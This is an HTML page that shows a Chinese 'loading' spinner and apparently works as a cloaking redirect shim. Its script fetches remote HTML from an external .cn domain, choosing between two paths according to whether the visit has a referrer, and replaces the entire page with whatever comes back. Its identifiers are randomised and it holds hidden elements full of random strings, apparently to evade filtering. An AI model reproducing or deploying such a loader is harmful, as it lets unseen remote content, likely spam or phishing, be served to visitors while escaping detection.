<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xhAp6h {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xhAp6h .MGjUTysbC1v {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xhAp6h .content {
            line-height: 50px;
            text-align: center
        }

        .xhAp6h .img {
            width: 100%
        }

        .xhAp6h .ibAgv28RAUq {
            text-align: center
        }

        .xhAp6h .ibAgv28RAUq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xhAp6h .ibAgv28RAUq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xhAp6h .ibAgv28RAUq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xhAp6h .ibAgv28RAUq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xhAp6h .ibAgv28RAUq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xhAp6h .ibAgv28RAUq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xhAp6h .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tGw0exWLUm86(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var chBKkRG = tGw0exWLUm86('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ chBKkRG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ chBKkRG +".html?a=share";
		}
		
        TZIhoI1dY=url+"#"+new Date().getTime();
        TZIhoI1dY && function() {
            $.get(TZIhoI1dY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>Sp2qZlWgXhHZrhvAvdA5rNUkD2AYNbFwd1KbI6hc7lbw4sYm8p0PEzw0nrSAdyaCAOB5u7PuGToeoJdsYRhTncYrNVggPN0pg</a>
<a  href='#' style='display:none'>Sp2qZlWgXhHZrhvAvdA5rNUkD2AYNbFwd1KbI6hc7lbw4sYm8p0PEzw0nrSAdyaCAOB5u7PuGToeoJdsYRhTncYrNVggPN0pg</a>
<b style='display:none' >bjTqt0pSRHugVm5CwE874RwSnYoVCkx16RKKWq5YXE</b>
<b style='display:none' >bjTqt0pSRHugVm5CwE874RwSnYoVCkx16RKKWq5YXE</b>
<ul style='display:none' >HeaqMXb1h26bePSOWVO3wkvs5VjB9lcyYHkQO0TVANe0k</ul>
<li style='display:none' >keiuYPsBVbXZb4sW15MdMqG99ymQZFj</li>
<span style='display:none'>S5IccSxD0cnYRxE4hMMMAQ9QOWtFJudJTp</span>
<h1 style='display:none' >zjMjVwW6qzMJnfBxZzpIdHbyNl1ViOnfwmMpbGPMww2s1Q7Gh8rAT6p1</h1><div class="xhAp6h">
    <div class="MGjUTysbC1v">
        <div class="ibAgv28RAUq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>HyVRFhhWXAuoZvxV23VVg7PMdUMCC4FVyez50RClitqBT20zdmUCtK37wa2ZPt</span>
<p  style='display:none'>Nt046mu1en0JaraSOu2SlYMI1lmff4OHnscsY8PxosobRbxYnpQRuUYENRt4hasZZu3ddeh6oPp0NIhqSZDB3JEACaDhS7PfUCJ</p>
<li style='display:none' >zOFI5M4PuH88gR8IfxuHuLsfcNulLcAw2Yb</li>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ekNBEigORL2Mfz2JrKcXdUkAgNqtBb7NvSSoqtLVPaCmN</a>
<img  src='' style='display:none'></body>
</html>